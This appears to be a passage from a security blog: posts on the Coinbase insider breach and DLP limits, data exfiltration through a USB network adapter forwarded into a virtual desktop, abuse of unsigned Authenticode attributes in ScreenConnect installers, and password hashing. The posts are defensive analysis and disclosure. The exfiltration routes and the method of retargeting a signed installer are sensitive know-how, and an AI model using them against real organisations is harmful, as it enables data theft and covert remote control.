Coinbase and the limits of DLP

In May, the world learned that Coinbase lost user data. Owing to disclosure requirements that apply to publicly-traded companies in the US, the company was compelled to issue a “confessional” SEC filing and associated blog-post dropping the news. Unnamed attackers had been extorting the company, threatening to release stolen private-information on customers obtained from an offshore vendor support vendor. Much as the announcement tried putting a brave face on the debacle and downplay the severity by pointing out that less than 1% of all customers were impacted, it was also notable for key omissions. For starters it turned out that one percent was not exactly random. Attackers had carefully targeted the most valuable customers: those with high-balance accounts, of greatest value to criminals interested in stealing cryptocurrency through social engineering.

While Coinbase was not upfront about what exactly went on, later reporting from Reuters and Fortune shed more light on the incident. It turned out the breach occurred in a decidedly low-tech fashion: Coinbase had outsourced its customer-support function to TaskUs, a business process outsourcing (BPO) company that operated support centers offshore with wages much lower than comparable US jobs. Some of those support representatives were bribed to funnel data over to the threat actor. These contractors did not have to “hack” anything any more than Edward Snowden had to breach anything at the NSA: by design, they were trusted insiders granted privileged access to Coinbase administrative systems for doing their daily jobs.

Granted, having access to customer data on your work machine is one thing. Shipping thousands of records from there to co-conspirators halfway around the world unnoticed is another. There is a slew of enterprise security products dedicated to making sure that does not happen. They are marketed under the catchy phrase DLP or “data-leak prevention.”

If we are being uncharitable, DLP threat-model can be summed up in one motto: “We catch the dumb ones.” These controls excel at stopping or at least detecting confidential information leaving the environment when the perpetrator makes no attempts to cover their tracks or lacks proper opsec skills despite best efforts. Example of rookie moves include:

  • Sending an email to your personal account from the corporate system, with a Word document attached containing the word “confidential”
  • Uploading the same document to Dropbox or Box (assuming those services are not used by the corporate IT environment, as would be the case for example when a company has settled on Google Workspace or Office365 for their cloud storage)
  • Creating a zip archive of an internal code repository and copying that to a removable USB drive.

Most DLP systems will sound the alarm when attackers are this inexperienced or brazen. But as soon as the slightest obfuscation or tradecraft is introduced, they can become surprisingly oblivious to what is happening.

Returning to the Coinbase incident: a natural question is whether TaskUs employed any DLP solutions, and if so, how the rogue insiders bypassed them so effectively that Coinbase remained oblivious as customer data went out the door for months. Not much has come to light about the exact IT environment of TaskUs. Were they running Windows or Macs? Did they have an old-school Active Directory setup or was the fleet managed through a more modern, cloud-centric setup such as Microsoft 365? There is good reason to expect the answers will be underwhelming. Customer support is outsourced overseas for one reason: reducing labor cost. It is unlikely that these shoestring-budget operations with their obsession on cost-cutting will be inclined to invest in fancy IT environments and robust security controls.

Yet it may not have mattered in the end. Some key details later emerged from an investigative piece on how the first handful of corrupt insiders were initially caught in January 2024— four months before Coinbase deigned to notify customers or investors about the extent of the problem. According to the Reuters article:

At least one part of the breach, publicly disclosed in a May 14 SEC filing, occurred when an India-based employee of the U.S. outsourcing firm TaskUs was caught taking photographs of her work computer with her personal phone, according to five former TaskUs employees.”

This is a stark reminder on the limitation of endpoint controls in general, not to mention the sheer futility of DLP technologies for protecting low-entropy information. TaskUs could have installed the kitchen sink of DLP solutions and not one of them would have made a difference for this specific attack vector. Equally misguided are calls for draconian restrictions on employee machines every time insider risks come up, as it must have for security teams in the aftermath of the Coinbase incident. It is possible to prevent screen-sharing and screenshots for specific URLs (Google Enterprise advertises controls for doing this in Chrome— assuming the IT department can reliably block all other browsers) or funnel all network traffic through a cloud proxy that only allows access to “known-good” websites. None of these prevent a disgruntled insider from using their phone to take a picture their desktop. For that matter, they can not stop a determined employee from memorizing short fragments of private information, such as the social-security number or address of a high-net-worth customer. This is much easier than trying to exfiltrate gigabytes of confidential documents or source code. Should customer support centers discriminate against candidates with good memorization skills?

To be clear, this is not an argument for throwing in the towel. There are standard precautions TaskUs could have taken given their threat model. Start with a policy against bringing personal devices into the workspace. This would at least have forced the malicious insiders to use company devices for exfiltration, giving DLP systems a fighting chance to catch them in case they stumbled. But even then, cameras are becoming ubiquitous in consumer electronics. Are employees not allowed to wear Meta Rayban glasses? For that matter, cameras are increasingly easy to conceal. Was that employee inspired to wear a three-piece suit to work today or is there a pinhole camera pointed at the screen hiding under that button?

In one sense, TaskUs and Coinbase were lucky. Customer service reps worked in a shared office space. They could witness and report on colleagues acting suspiciously. Consider how this scenario would have played out during the pandemic or for that matter in scenarios where employees are working remotely, with same level of access minus the deterrence factor of other people observing their actions.

CP

The mystery network interface: unexpected exfiltration paths

This is a story about accidentally stumbling on a trivial exfiltration path out of an otherwise locked-down environment. Our setting is a multi-national enterprise with garden-variety Windows-centric IT infrastructure with one modern twist: instead of physical workstations on desks or laptops, employees are issued virtual desktops. They connect to these Windows VMs to work from anywhere, getting a consistent experience whether they are physically situated in their own assigned office location, visiting one of the worldwide locations or from the comfort of their home— a lucky break that allowed for uninterrupted access during the pandemic.

Impact of virtualization

Virtualization makes some problems easier. It is an improvement over issuing employees laptops that leave the premises every night and can be used in the privacy of an employee residence without any supervision. Laptops walk out the door every night, can be stolen, stay offline for extended periods without security updates, connect to dubious public networks or interface with random hardware— printers, USB drives, docking stations, Bluetooth speakers— all of which create more novel ways to lose company data resident on that device. These risks are not insurmountable; there are well-understood mitigations for managing each one. For example, full-disk encryption can protect against offline recovery from disk in case of theft. But each one must be addressed by the defenders. Virtual desktops are immune from entire classes of attacks applicable to physical devices that can wander outside the trusted perimeter.

But virtualization can also introduce complications into other classic enterprise security challenges. Data leak prevention or DLP is one this particular firm greatly obsessed about. Most modern startups are far more concerned about external threat actors trying to sneak inside the gates and rampage through precious resources inside the perimeter. Businesses founded on intellectual property prioritize a different threat model: attackers already inside the perimeter moving confidential corporate data outside. Usually this is framed in the context of insider malfeasance: rogue employees jumping ship to a competitor trying to take some of the secret sauce with them. But under a more charitable interpretation, it can also be viewed as defense-in-depth against an external attacker who compromises the account of an otherwise honest insider, with the intention of rummaging through corporate IP. In all cases, defenders must focus on all possible exfiltration paths— avenues for communicating with the “outside world”— and implement controls on each channel.

Sure enough, the IT department spent an inordinate amount of time doing exactly that. For example, all connections to the Internet are funneled through a corporate proxy. When necessary that proxy executes a man-in-the-middle attack on TLS connections to view encrypted traffic. (No small irony that activity that would constitute criminal violation of US wiretap statutes in a public setting has become standard practice for IT departments that are possesses of a particular mindset around network security.) This setup affords both proactive defense and detection after the fact:

  1. Outright block connections to file-sharing sites such as Dropbox and Box to prevent employees from uploading company documents to unsanctioned locations. (Dreaded “shadow IT” problem.)
  2. Even for sites with permitted connection, log all history of connections, type of HTTP activity (GET vs POST vs PUT) including hash of the content exchanged. This allows identifying an employee after the fact if he/she goes on an upload spree to copy company IP from the internal environment to a cloud service.

Rearranging deck chairs

In other ways virtualization does not change the nature of risk but merely reshuffles it downstream, to the clients used for connecting to the machine where the original problem used to live.

This enterprise allowed connections from unmanaged personal devices. It goes without saying there will be little assurance about the security posture of a random employee device. (Despite the long history of VPN clients trying to encroach into device-management under the guise of “network health checks,” where connections are only permitted for clients devices “demonstrating” their compliance with corporate policies.) One way to solve this problem is by treating the remote client as untrusted: isolate content on the virtual desktop as much as possible from the client, effectively presenting a glorified remote GUI.

There is a certain irony here. Remote desktop access solutions have gotten better over time at supporting more integration with client-side hardware. For example over the years Microsoft RDP has added support to:

  • Share local drives with the remote machine
  • Use a locally attached printer to print
  • Allow local smart-cards to be used for logging into the remote system
  • Allow pasting from local clipboard to the remote machine, or vice verse by pasting content from the remote PC locally
  • Forward any local USB device such as webcam to the remote target
  • Forward local GPUs to the remote device via RemoteFX vGPU

These are supposed to be beneficial features: they improve productivity when using a remote desktop for computing. Yet they become trivial exfiltration vectors in the hands of a disgruntled employee trying to take corporate IP off their machine.

The mystery NIC

Fast forward to an employee connecting to their virtual desktop from home. Using the officially sanctioned VPN client and remote-desktop software anointed by the IT department, this person logs into their work PC as usual. Later on in the session, an unexpected OS notification appears regarding the discovery of an unknown network. That innocuous warning in fact signals a glaring oversight in exfiltration controls.

Peeking at “Network Connections” in Control Panel confirms the presence of a second network interface:

Network interfaces: the more, the merrier?

The appearance of the mystery NIC can be traced to an interaction between two routine actions:

  1. The employee connected their laptop to a docking station containing an Ethernet adapter. This is not an uncommon setup, since docking allows use of a larger secondary monitor and external keyboard/mouse for better ergonomics.
  2. Remote-desktop client was configured to forward newly connected USB devices to the remote server. This is also a common setup, to better single out devices that are intended for redirection by the explicit action of plugging them in after the session is created.
Microsoft RDP client settings for forwarding local devices. (Other remote-access clients have comparable features.)

The second point requires some qualifications. While arbitrary USB forwarding over RDP is clearly risky, it is necessary to forward some classes of devices. For instance, video conferencing requires a camera and microphone. Virtual desktops do not have any audio or video devices of their own. (Even if such emulated devices did exist and received synthetic A/V feeds, they would be useless for the purpose of projecting the real audio/video from the remote user.) That makes a blanket ban against all USB forwarding infeasible. Instead defenders are forced to carefully manage exceptions by device class.

It turns out in this case the configuration was too permissive: it allowed forwarding USB network adapters.

Free for all

On the remote side, once Windows detects the presence of an additional USB device, plug-and-play (once derided as plug-and-pray) works its magic:

  1. Device class is identified
  2. Appropriate device driver is loaded. There was an element of luck here in that the necessary driver was already present out-of-the-box on Windows, avoiding the need to search/download the driver via Windows Update. (This is still automatically done by Windows, for drivers that have passed WHQL certification.)
  3. Network adapter is initialized
  4. DHCP is used to acquire an IP address

Depending on group policy, some security controls continue to apply to this connection. For example the Windows firewall rules will still be in effect and can prevent accepting connections. But anything else not explicitly forbidden by policy will work. This is an important distinction. It turns out the reason many obvious exfiltration paths fail in the standard enterprise setup is an accident of network architecture, instead of deliberate endpoint controls. For instance, users can not connect to a random SMB share on the Internet because there is no direct route from the internal corporate network. By contrast mounting file-shares work just fine inside the trusted intranet environment; the difference is one of reachability. Similar observations apply to outbound SSH, SFTP, RDP and all other protocols except HTTP/HTTPS. (Because web access is critical to productivity, almost every enterprise fields dedicated forward proxies to sustain the illusion that every server on the Internet can be accessed on ports 80/443.) Most enterprises will not restrict connections using these protocols because of an implicit assumption that any host reachable on those ports is part of the trusted environment.

A secondary network interface changes that, opening another path for outbound connections. This one is no longer constrained by the intranet setup assumed by the IT department. Instead it depends on the network that Ethernet-to-USB adapter is attached to— one that is controlled by the adversary in this threat model. In the extreme case, it is wide open to connections from the internet. More realistically the virtual desktop will appear as yet another device on the LAN segment of a home network. In that case there will be some restrictions on inbound access but nothing preventing outbound connections.

Exfiltration possibilities are endless:

  1. Hard-copies of documents can be printed to a printer on the local network
  2. Network drives such as NAS units can be mounted as SMB shares, allowing easy drag-and-drop copy from virtual desktop.
  3. To stay under the radar, one can deploy another device on the local network to act as an SFTP server. On the virtual desktop side, an SFTP client such as putty or Windows’ own SSH client (standard on recent Win10/11 builds) can then upload files to that server. While activity involving file-shares and copying via Windows tends to be closely watched by resident EDR software, SFTP is unlikely to leave a similar audit trail.
  4. For those committed to GUI-based solutions, outbound RDP also works. One could deploy another Windows machine with remote access enabled on the home network, to act as the drop point for files. Then an RDP connection can be initiated from the virtual desktop, sharing the C:\ drive to the remote target. This makes the entire contents of the virtual desktop available to the unmanaged PC. While inbound RDP is disallowed from sharing drives, there are typically no such restrictions on outbound RDP— yet another artifact of the assumption that such connections can only work inside the safe confines of trusty intranet, where every possible destination is another managed enterprise asset.
  5. For a much simpler but noisier solution, vanilla cloud-storage sites (Box, Dropbox, …) will also accessible through the secondary interface. When connections are not going through the corporate proxy, rules designed to block file-sharing sites have no affect. Since most of these website offer file uploads through the web browser, no special software or dropping to a command line is required.
    • Caveat: It may take some finessing to get existing software on the remote desktop to use the second interface. While command line utilities such as curl will accept arguments to specify a particular interface used for initiating connections, browsers rarely expose that level of control.

These possibilities highlight a general point about the attackers’ advantage when it comes to preventing exfiltration from a highly connected environment. When a miss is as good as a mile, the fragility (futility?) of DLP solutions should ask customers to question whether this mitigation can amount to anything more than bureaucratic security theater.

CP

ScreenConnect: “unauthenticated attributes” are not authenticated

(Lessons from the ScreenConnect certificate-revocation episode)

An earlier blog post recounted the discovery of threat actors leveraging the ScreenConnect remote assistance application in the wild, and events leading up to DigiCert revoking the certificate previously issued to the vendor ConnectWise for signing those binaries. This follow-up is a deeper, more technical dive into a design flaw in the ScreenConnect executable that made it particularly appealing for malicious campaigns.

Trust decisions in an open ecosystem

Before discussing what went wrong with ScreenConnect, let’s cover the “sunny-day path” or how code-signing is supposed to work. To set context, let’s rewind the clock ~20 years, back to when software distribution was far more decentralized. Today most software applications are purchased through a tightly controlled app-store such as the one Apple operates for Macs and iPhones. In fact mobile devices are locked down to such an extent that it is not possible to “side-load” applications from any other source, without jumping through hoops. But this was not always the case and certainly not for the PC ecosystem. Sometime in the late 1990s with the mass adoption of the Internet, downloading software increasingly replaced the purchase of physical media. While anachronistic traces of “shrink-wrap licenses” survive in the terminology, few consumers were actually removing shrink-wrapping from a cardboard box containing installation CDs. More likely their software was downloaded using a web-browser directly from the vendor website.

That shift had a darker side: it was a boon for malware distribution. Creating packaged software with physical media takes time and expense. Convincing a retailer to devote scarce shelf-space to that product is an even bigger barriers. But anyone can create a website and claim to offer a valuable piece of software, available for nothing more than the patience required for the slow downloads over the meager “broadband” speeds of the era. Operating system vendors even encouraged this model: Sun pushed Java applets in the browsers as a way to add interactivity to static HTML pages. Applets were portable: written for the Java Virtual Machine, they can run just as well on Windows, Mac and 37 flavors of UNIX in existence at the time. MSFT predictably responded with a Windows-centric take on this perceived competitive threat against the crown jewels: ActiveX controls. These were effectively native code shared libraries, with full access to the Windows API. No sandboxing, no restrictions once execution starts. Perfect vehicle for malware distribution.

Code-signing as panacea?

Enter Authenticode. Instead of trying to constrain what applications can do once they start running, MSFT opted for a black & white model for trust decisions made at installation time based on the pedigree of the application. Authenticode was a code-signing standard that can be applied to any Windows binary: ActiveX controls, executables, DLLs, installers, Office macros and through an extensibility layer even third-party file formats although there were few takers outside of the Redmond orbit. (Java continued to use its own cross-platform JAR signing format on Windows, instead of the “native” way.) It is based on public-key cryptography and PKI, much like TLS certificates. Every software publisher generates a key-pair and obtains a digital certificate from one of a handful of trusted “certificate authorities.” The certificate associates the public-key with the identity of the vendor, for example asserting that a specific RSA public-key belongs to Google. Google can use its private-key to digitally sign any software it publishes. Consumers downloading that software can then verify the signature to confirm that the software was indeed written by Google.

A proper critique of everything wrong with this model— starting with its naive equation of “identified vendor” to “trusted/good” software you can feel confident installing— would take a separate essay. For the purposes of this blog post, let’s suspend disbelief and assume that reasonable trust decisions can be made based on a valid Authenticode signature. What else can go wrong?

Custom installers

One of the surprising properties about ScreenConnect installer is that the application is completely turnkey: after installation, the target PC is immediately placed under remote control of a particular customer. No additional configuration files to download, no questions asked of end users. (Of course this property makes ScreenConnect equally appealing for malicious actors as it does for IT administrator.) That means the installer has all the necessary configuration included somehow. For example it must know which remote server to connect for receiving remote commands. That URL will be different for every customer.

By running strings on the application, we can quickly locate this XML configuration.
For the malicious installer masquerading as bogus River “desktop app:”

This means ScreenConnect is somehow creating a different installer on-demand for every customer. The UI itself appears to support that thesis. There is a form with a handful of fields you can complete before downloading the installer. Experiments confirm that a different binary is served when those parameters are changed.

That would also imply that ConnectWise must be signing binaries on the fly. A core assumption in code-signing is a digitally signed application can not be altered without invalidating that signature. (If that were not true, signatures would become meaningless. An attacker can take an authentic, benign binary, modify it to include malicious behavior and have that binary continue to appear as the legitimate original. There have been implementation flaws in Authenticode that allowed such changes, but these were considered vulnerabilities and addressed by Microsoft.) 

But using osslcode to inspect the signature in fact shows:

    1. All binaries have the same timestamp. (Recall this is a third-party timestamp, effectively a countersignature, provided by a trusted-third party, very often a certificate authority.)

    2. All binaries have the same hash for the signed portion

Misuse of unauthenticated attributes

That second property requires some explanation. In an ideal world the signature would cover every bit of the file— except itself, to avoid creating a self-referential. There are indeed some simple code-signing standards that work this way: raw signature bytes are tacked on at the end of the file, offloading all complexity around format and key-management (what certificate should be used to verify this signature?) to the verifier.

While Authenticode signatures also appear at the end of binaries, their format is on the opposite end of the spectrum. It is based on a complex standard called Cryptographic Message Syntax (CMS) which also underlies other PKI formats including S/MIME for encrypted/signed email. CMS defines complex nested structures encoded using a binary format called ASN1. A typical Authenticode signatures features:

  • Actual signature of the binary from the software publisher
  • Certificate of the software publisher generating that signature
  • Any intermediate certificates chaining up to the issuer required to validate the signature
  • Time-stamp from trusted third-party service
  • Certificate of the time-stamping service & additional intermediate CAs

None of these fields are covered by the signature. (Although the time-stamp itself covers the publisher signature, as it is considered a “counter-signature”) More generally CMS defines a concept of “unauthenticated_attributes:” these are parts of the file not covered by the signature and by implication, can be modified without invalidating the signature.

It turns out ScreenConnect authors made a deliberate decision to abuse the Authenticode format.  They deliberately place the configuration in one of these unauthenticated attributes. The first clue to this comes from dumping strings from the binary along with the offset where they occur. In a 5673KB file the XML configuration appears within the last 2 kilobytes—  the region where we expect to find the signature itself.

The extent of this anti-pattern becomes clear when we use “osslsigncode extract-signature” to isolate the signature section:

$ osslsigncode extract-signature RiverApp.ClientSetup.exe RiverApp.ClientSetup.sig
Current PE checksum   : 005511AE
Calculated PE checksum: 0056AFC0
Warning: invalid PE checksum
Succeeded

$ ls -l RiverApp.ClientSetup.sig
-rw-rw-r-- 1 randomoracle randomoracle 122079 Jun 21 12:35 RiverApp.ClientSetup.sig

122KB? That far exceeds the amount of space any reasonable Authenticode signature could take up, even including all certificate chains. Using openssl pkcs7 subcommand to parse this structure reveals the culprit for the bloat at offset 10514:

There is a massive ~110K section using the esoteric OID “1.3.6.1.4.1.311.4.1.1”  (The prefix 1.3.6.1.4.1.311 is reserved for MSFT; any OID starting with that prefix is specific to Microsoft.)

Looking at the ASN1value we find a kitchen sink of random content:

  • More URLs
  • Additional configuration as XML files
  • Error messages encoded in Unicode (“AuthenticatedOperationSuccessText”)
  • English UI strings as ASCII strings (“Select Monitors”)
  • Multiple PNG image files

It’s important to note that ScreenConnect went out of its way to do this. This is not an accidental feature one can stumble into. Simply tacking on 110K at the end of the file will not work. Recall that the signature is encapsulated in a complex, hierarchical data structure encoded in ASN1. Every element contains a length field. Adding anything to this structure requires updating the length field for every enclosing element. That’s not simple concatenation: it requires precisely controlled edits to ASN1. (For an example, see this proof-of-concept that shows how to “graft” the unauthenticated attribute section from one ScreenConnect binary to another using the Python asn1crypto module.)

The problem with mutable installers

The risks posed by this design become apparent when we look at what ScreenConnect does after installation: it automatically grants control of the current machine to a remote third-party. To make matters worse, this behavior is stealthy by design. As discussed in the previous blog post, there are no warnings, no prompts to confirm intent and and no visual indicators whatsoever that a third-party has been given privileged access.

That would have been dangerous on its own— ripe for abuse if a ScreenConnect customers uses that binary for managing machines that are not part of their enterprise. At that point crosses the line from “remote support application”  into “remote administration Trojan” or RAT territory. But the ability to tamper with configuration in a signed binary gives malicious actors even more leeway. They do not even need to be a ScreenConnect customer. All they need to do is get their hands on one signed binary in the wild. They can now edit the configuration residing in the unauthenticated ASN1 attribute, changing the URL for command & control server to one controlled by the attacker. Authenticode signature continues to validate and the tampered binary will still get the streamlined experience from Windows: one-click install without elevation prompt. But instead of connecting to a server managed by the original customer of ScreenConnect, it will now connect to the attacker command & control server to receive remote commands.

Resolution

This by-design behavior in ScreenConnect was deemed such high risk that the certificate authority (DigiCert) who issued ConnectWise their Authenticode certificate took the extraordinary step of revoking the certificate and invalidating all previously signed binaries. ConnectWise was forced to scramble and coordinate a response with all customers to upgrade to a new version of the binary. The new version no longer embeds critical configuration data in unauthenticated signature attributes.

While the specific risk with ScreenConnect has been addressed, it is worth pointing out that nothing prevents similar installers from being created by other software publishers. No changes have been made to Authenticode verification logic in Windows to reject extra baggage appearing in signatures. It is not even clear if such a policy can be enforced. There is enough flexibility in the format to include seemingly innocuous data such as extra self-signed certificates in the chain. For that matter, even authenticated fields can be used to carry extra information, such as the optional nonce field in the time-stamp. For the foreseeable future it is up to each vendor to refrain from using such tricks and creating installers that can be modified by malicious actors.

CP

Acknowledgments: Ryan Hurst for help with the investigation and escalating to DigiCert

The story behind ScreenConnect certificate revocation

An unusual phishing site

In late May, the River security team received a notification about a new fraudulent website impersonating our service. Phishing is a routine occurrence that every industry player contends with. There are common playbooks invoked to take-down offending sites when one is discovered. 

What made this case stand out was the tactic employed by the attacker. Most phishing pages go after credentials. They present a fraudulent authentication page that mimics the real one, asking for password or OTP codes for 2FA. Yet the page we were alerted about did not have any way to log in. Instead, it advertised a fake “River desktop app.” River publishes popular mobile apps for iOS and Android, but there has never been a desktop application for Windows, macOS, or Linux.

As this screenshot demonstrates, the home page was subtly altered to replace the yellow “Sign up” button on the upper-right corner with one linking to the bogus desktop application. We observed the site always serves the same Windows app, regardless of the web browser or operating system used to view the page. Google Chrome on macOS and Firefox on Linux both received the same Windows binary, despite the fact that it could not have run successfully on those platforms.

This looked like a bizarre case of a threat actor jumping through hoops to write an entire Windows application to confuse River clients. Native Windows applications are a rare breed these days— most services are delivered through web or mobile apps. The story only got stranger once we discovered the application carried a valid code signature.

Authentic malware

Quick recap on code signing: Microsoft has a standard called “Authenticode” for digitally signing Windows applications. These signatures identify the provenance and integrity of the software, proving authorship and guaranteeing that the application has not been tampered with from the original version as published. This is crucial for making trust decisions in an open ecosystem when applications may be sourced from anywhere, not just a curated app store.

Authenticode signatures can be examined on non-Windows platforms using the open-source osslsigncode utility. This binary was signed by ConnectWise, using a valid certificate issued in 2022 from DigiCert:

Windows malware is pervasive, but malware bearing a valid digital signature is less common, and short-lived. Policies around code-signing certificates are clear on one point: if it is shown that a certificate is used to sign harmful code, the certificate authority is obligated to revoke it. (Note that code-signing certificates are governed by the same CAB Forum that sets issuance standards for TLS certificates, but under a different set of rules than the more common TLS use-case.)

ConnectWise is a well-known company that has been producing software for IT support over a decade. As it is unlikely for such a reputable business to operate malware campaigns on the side, our first theory was a case of key-compromise: a threat actor obtained the private keys that belonged to ConnectWise and started signing their own malicious binaries with it. This is the most common explanation for malware that is seemingly published by reputable companies: someone else took their keys and certificate. Perhaps the most famous case was Stuxnet malware targeting Iran’s nuclear enrichment program in 2010, using Windows binaries signed by valid certificates of two  Taiwanese companies with no relationship to either the target or (presumed) attackers.

Looking closer at the “malware” served from the fraudulent website we were investigating, we discovered something even more bizarre: the attackers did not go to the trouble of writing a new application from scratch or even vibe-coding one with AI. This was the legitimate ScreenConnect application published by ConnectWise, served up verbatim, simply renamed as a bogus River desktop application.

That was not an isolated example. On the same server, we discovered samples of the exact same binary relabeled to impersonate additional applications, including a cryptocurrency wallet. We are far from being the first or only group to observe this in the wild. Malwarebytes noted social-security scams delivering ScreenConnect installer in April this year, and Lumu published an advisory around the same time.

Fine line between remote assistance and RAT

ScreenConnect is a remote-assistance application for Windows, Mac, and even Linux systems. Once installed, it allows an IT department to remotely control a machine, for example by deploying additional software, running commands in the background, or even joining an interactive screen-sharing session with the user to help troubleshoot problems. 

Below is an example of what an IT administrator might see on the other side when using the server-side of ScreenConnect, either self-hosted or via a cloud service provided by ConnectWise. 

Example remote command invocation via ScreenConnect dashboard. Note commands are executed as the privileged NT AUTHORITY\SYSTEM user on the target system.

At least this is the intended use case. From a security perspective, ScreenConnect is a classic example of a “dual-use application.” In the right hands, it can deliver a productivity boost to overworked IT departments, helping them deliver better support to their colleagues. In the wrong hands, it becomes a weapon for malicious actors to remotely compromise machines belonging to unsuspecting users. To be clear: ScreenConnect is not alone in this capacity. There are multiple documented instances of remote-assistances apps repurposed by threat actors at scale to remotely commandeer PCs of users they had no relationship with. But there are specific design decisions in the ScreenConnect installer as well as the application itself that greatly amplify the potential for abuse:

  • The installation proceeds with no notice or consent. Because the binary carries a valid Authenticode signature, elevation to administrator privileges is automatic. Once elevated, there are no additional warnings or indications, nothing to help the consumer realize they are about to install a dangerous piece of software and cede control of their PC to an unknown third-party.
  • Once installed, remote control takes effect immediately. No reboot required, no additional dialog asking users to activate the functionality.
  • There is no indication that the PC is under remote management or that remote commands are being issued. For example, there is no system tray icon, notifications, or other visual indicators. (Compare this to how screen sharing— far less intrusive than full remote control— works with Zoom or Google Meets: users are given a clear indication that another participant is viewing their screen, along with a link to stop sharing any time.)
  • There is no desktop icon or Windows menu entry created for ScreenConnect. For a customer who was expecting to get the River desktop app, it looks like the installation silently failed because their desktop looks the same as before. To understand what happened, users would have to visit the Windows control panel, review installed programs and observe that an unexpected entry called “ScreenConnect” has appeared there.
After installation, no indication that ScreenConnect is present on the system.
  • Compounding these client-side design decisions, ScreenConnect was offering a 14-day free trial with nothing more than a valid email address required to sign up. [The trial page now states that it is undergoing maintenance— last visited June 15th.] A threat actor could take advantage of this opportunity to download customized installers such that upon completion, the machine where the installer ran will be under the control of that actor. (It is unclear if the threat actor impersonating River used a free trial with the cloud instance, or if they compromised a server belonging to an existing ScreenConnect customer. Around the same time, we found malware masquerading as a River desktop application, CISA issued a warning about a ScreenConnect server vulnerability being exploited in the wild.)

Disclosure timeline

  • May 30: Emails sent to security@ aliases for ScreenConnect and ConnectWise. No acknowledgment received in response.
    • We later determined that the company expects to receive vulnerability disclosures at a different email alias, and our initial reports did not reach the security team.
  • Jun 1: Ryan Hurst helped escalate the issue to DigiCert and outlined why this usage of a code-signing certificate contravenes CAB Forum rules. 
  • Jun 2: DigiCert acknowledged receiving the report of our investigation.
  • Jun 3: DigiCert confirms the certificate has been revoked.
    • Initial revocation time was set to June 3rd. Because Authenticode signatures also carry a trusted third-party timestamp, it is possible to revoke binaries forward from a specific point in time. This is useful when a specific key-compromise date can be identified: all binaries time-stamped before that point remain valid, all later binaries are invalidated. The malicious sample found in the wild masquerading as a River desktop app was timestamped March 20th. The most recent version of the ScreenConnect binary obtained via the trial subscription bears a timestamp of May 20th. Setting the revocation time to June 3rd has no effect whatsoever on validity of existing binaries in the wild, including those repurposed by malicious actors.
  • Jun 4: DigiCert indicates the revocation timestamp will be backdated to issuance date of the certificate (2022) once ConnectWise has additional time to publish a new version.
  • Jun 6: The ConnectWise security team gets in contact with River security team.
  • Jun  9: ConnectWise notifies customers about an impending revocation, stating that installers must be upgraded by June 10th.
  • Jun 10: ConnectWise extends deadline to June 13th.
  • Jun 13: Revocation timestamp backdated to issuance by DigiCert, invalidating all previously signed binaries. This can be confirmed by retrieving the DigiCert CRL and looking for the serial ID of the ConnectWise certificate:
$ curl -s "http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl" | openssl crl -inform DER -noout -text | grep -A4 "0B9360051BCCF66642998998D5BA97CE"
    Serial Number: 0B9360051BCCF66642998998D5BA97CE
        Revocation Date: Aug 17 00:00:00 2022 GMT
        CRL entry extensions:
            X509v3 CRL Reason Code: 
                Key Compromise

Acknowledgements

  1. Ryan Hurst for help with the investigation and recognizing how this scenario represented a divergence from CAB Forum rules around responsible use of code-signing certificates. While we were not the first to spot threat actors leveraging ScreenConnect binaries in the wild, it was Ryan who brought this matter attention to the attention of the one entity— DigiCert, the issuing certificate authority— in a position to take decisive action and mitigate the risk.
  2. DigiCert team for promptly taking action to protect not only River clients, but all Windows users against all potential uses of the ScreenConnect fraudulently mislabeled as another legitimate application.

Matt Ludwigs & Cem Paya, for River Security Team


The case for keyed password hashing

An idea whose time has come?

Inefficient by design

Computer science is all about efficiency: doing more with less. Getting to the same answer faster in fewer CPU cycles, using less memory or economizing on some other scarce resource such as power consumption. That philosophy makes certain designs stand out for doing exactly the opposite: protocols crafted to deliberately waste CPU cycles, take up vast amounts of memory or delay availability of some answer. Bitcoin mining gets criticized— often unfairly— as the poster-child for an arms race designed to throw more and more computing power at a “useless” problem. Yet there is a much older, more mundane and rarely questioned waste of CPU cycles: password hashing.

In the beginning: /etc/passwd

Password hashing has ancient origins when judged by the compressed timeline of computing history. Original UNIX systems stored all user passwords in a single world-readable file under /etc/passwd. That was in the day of time-sharing systems, when computers were bulky and expensive. Individuals did not have the luxury of keeping one under their desk, much less in their pocket. Instead they were given accounts on a shared machine owned and managed by the university/corporation/branch of government. When Alice and Bob are on the same machine, the operating system is responsible for making sure they stay in their lane: Alice can’t access Bob’s files or vice verse. Among other things, that means making sure Alice can not find out Bob’s password.

Putting everyone’s password in a single world-readable file obviously fall short of that goal. Instead UNIX took a different approach: place a one-way cryptographic hash of the password. Alice and Bob could still observe each other’s password hashes but the hashes alone were not useful. Logging into the system required the original, cleartext version of the password. With a cryptographic hash the only way to “invert” the function is by guessing: start with a list of likely passwords, hash each one and compare against the one stored in the passed file. The hash function was also made deliberately slow. In most cryptographic applications, one prefers their hash function to execute quickly, inefficiency is a virtue here. It slows down attackers more than it slows down the defenders. The hash function is executed only a handful of times for “honest” paths when a legitimate user is trying to login. By contrast an attacker trying to guess passwords must repeat the same operation billions of times.

Later UNIX versions changed this game by separating password hashes— sensitive stuff— from other account metadata which must remain world-readable. Hashes were moved to a different place appropriately called the “shadow” file commonly placed at /etc/shadow. With this improvement attackers must first exploit a local privilege-escalation vulnerability to read the shadow file before they can unleash their password-cracking rig on target hashes.

Atavistic designs for the 21st century

While the 1970s are a distant memory, vestiges of this design persist in the way modern websites manage customer passwords. There may not be a world-readable password file or even shadow file at risk of being exposed to users but in one crucial way the best-practice has not budged: use one-way hash function to process passwords for storage. There have been significant advances in the construction of the hash functions are designed. For example the 1990s era  PBKDF2 includes an adjustable difficulty— read: inefficiency— level, allowing the hash function to waste more time as CPUs become faster. Its modern successor bcrypt follows the same approach. Scrypt ups the along a new dimension: in addition to being inefficient in time by consuming gratuitous amount of CPU cycles, it also seeks to be inefficient in space by deliberately gobbling up memory to prevent attackers from leveraging fast but memory-constrained systems such as GPUs and ASICs. (Interestingly these same constraints also come up in the design of proof-of-work functions for blockchains where burning up some resource such as CPU cycles is the entire point.)

